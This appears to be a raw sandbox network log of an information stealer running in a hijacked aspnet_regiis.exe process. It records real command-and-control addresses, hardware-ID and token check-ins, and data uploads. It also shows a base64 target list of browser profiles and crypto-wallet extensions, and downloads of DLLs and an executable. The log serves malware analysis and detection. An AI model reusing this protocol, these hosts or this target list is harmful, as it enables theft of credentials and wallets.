Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 57970 | 147.45.44.104 | 80 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
Oct 3, 2024 03:27:21.603456020 CEST | 183 | OUT | GET /ldms/a43486128347.exe HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 147.45.44.104
                                                                                                                          Cache-Control: no-cache
Oct 3, 2024 03:27:22.257582903 CEST | 314 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:22 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 13
                                                                                                                          Last-Modified: Thu, 03 Oct 2024 01:25:21 GMT
                                                                                                                          Connection: keep-alive
                                                                                                                          Keep-Alive: timeout=120
                                                                                                                          ETag: "66fdf281-d"
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 55 6e 6b 6e 6f 77 6e 20 65 72 72 6f 72
                                                                                                                          Data Ascii: Unknown error


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 57946 | 104.102.49.254 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:42 UTC | 119 | OUT | GET /profiles/76561199780418869 HTTP/1.1
                                                                                                                          Host: steamcommunity.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:42 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:42 GMT
                                                                                                                          Content-Length: 34879
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: sessionid=3fa6e5fec03c50e224752d71; Path=/; Secure; SameSite=None
                                                                                                                          Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-03 01:26:42 UTC | 14514 | IN
                                                                                                                          Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-03 01:26:42 UTC | 16384 | IN
                                                                                                                          Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-03 01:26:42 UTC | 3768 | IN | Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-03 01:26:42 UTC | 213 | IN | Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 57947 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:43 UTC | 184 | OUT | GET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:43 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:43 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 57948 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:44 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 256
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:44 UTC | 256 | OUT | Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="hwid"8819640992122040409402-a33c7340-61ca------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKF--
2024-10-03 01:26:45 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:45 UTC | 69 | IN | Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 3a1|1|1|1|616e377245a2b36ffedf2f7ef732c045|1|1|1|0|0|50000|10


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 57949 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:46 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:46 UTC | 331 | OUT | Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------GIEBFHCAKFBGDHIDHIDBCont
2024-10-03 01:26:46 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:46 UTC | 1564 | IN | Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 57950 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:47 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:47 UTC | 331 | OUT | Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
2024-10-03 01:26:48 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:48 UTC | 5685 | IN | Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 57951 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:49 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 332
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:49 UTC | 332 | OUT | Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IJDHDGDAAAAKFIDGHJDGCont
2024-10-03 01:26:49 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:49 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:49 UTC | 119 | IN | Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 57952 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:50 UTC | 277 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----IDAKJKEHDBGHIDHIEHDB
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 6965
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:50 UTC | 6965 | OUT | Data Ascii: ------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------IDAKJKEHDBGHIDHIEHDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------IDAKJKEHDBGHIDHIEHDBCont
2024-10-03 01:26:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:26:51 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 57953 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:51 UTC | 192 | OUT | GET /sqlp.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:26:52 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:26:51 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2459136
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:26:51 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 57954 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:54 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:54 UTC | 829 | OUT | Data Ascii:
------AFHIEBKKFHIEGCAKECGH
Content-Disposition: form-data; name="token"

616e377245a2b36ffedf2f7ef732c045
------AFHIEBKKFHIEGCAKECGH
Content-Disposition: form-data; name="build_id"

433cd71b7a2bdd3668a493b00ee95630
------AFHIEBKKFHIEGCAKECGH
Cont
2024-10-03 01:26:55 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:26:55 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 57955 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:55 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:55 UTC | 437 | OUT | Data Ascii:
------DHJDAKEGDBFHCAAKJJJD
Content-Disposition: form-data; name="token"

616e377245a2b36ffedf2f7ef732c045
------DHJDAKEGDBFHCAAKJJJD
Content-Disposition: form-data; name="build_id"

433cd71b7a2bdd3668a493b00ee95630
------DHJDAKEGDBFHCAAKJJJD
Cont
2024-10-03 01:26:56 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:26:56 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.7 | 57956 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:57 UTC | 276 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:57 UTC | 437 | OUT | Data Ascii:
------GIEBFHCAKFBGDHIDHIDB
Content-Disposition: form-data; name="token"

616e377245a2b36ffedf2f7ef732c045
------GIEBFHCAKFBGDHIDHIDB
Content-Disposition: form-data; name="build_id"

433cd71b7a2bdd3668a493b00ee95630
------GIEBFHCAKFBGDHIDHIDB
Cont
2024-10-03 01:26:57 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-10-03 01:26:57 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.7 | 57957 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:26:58 UTC | 195 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:26:58 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:26:58 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:26:58 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                                          Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 7d 88 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff
                                                                                                                          Data Ascii: }eUeLXee0@eeeue0UEeeUeee $
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 38 8b 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80
                                                                                                                          Data Ascii: 8O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEE
                                                                                                                          2024-10-03 01:26:59 UTC16384INData Raw: 1c c1 ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6
                                                                                                                          Data Ascii: ,0<48%8A)$


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.7 | 57958 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:00 UTC | 195 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:00 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:00 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:00 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 57959 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:02 UTC | 196 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Connection: Keep-Alive
Cache-Control: no-cache
2024-10-03 01:27:02 UTC | 262 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:02 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Thursday, 03-Oct-2024 01:27:02 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          14 | 192.168.2.7 | 57960 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-03 01:27:04 UTC | 196 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:04 UTC | 262 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:04 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 257872
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:04 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          15 | 192.168.2.7 | 57961 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-03 01:27:05 UTC | 200 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:06 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:06 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 80880
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:06 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes


                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                          16 | 192.168.2.7 | 57962 | 49.12.197.9 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                          2024-10-03 01:27:07 UTC | 192 | OUT | GET /nss3.dll HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          2024-10-03 01:27:08 UTC | 263 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:07 GMT
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Content-Length: 2046288
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Thursday, 03-Oct-2024 01:27:07 GMT
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Accept-Ranges: bytes
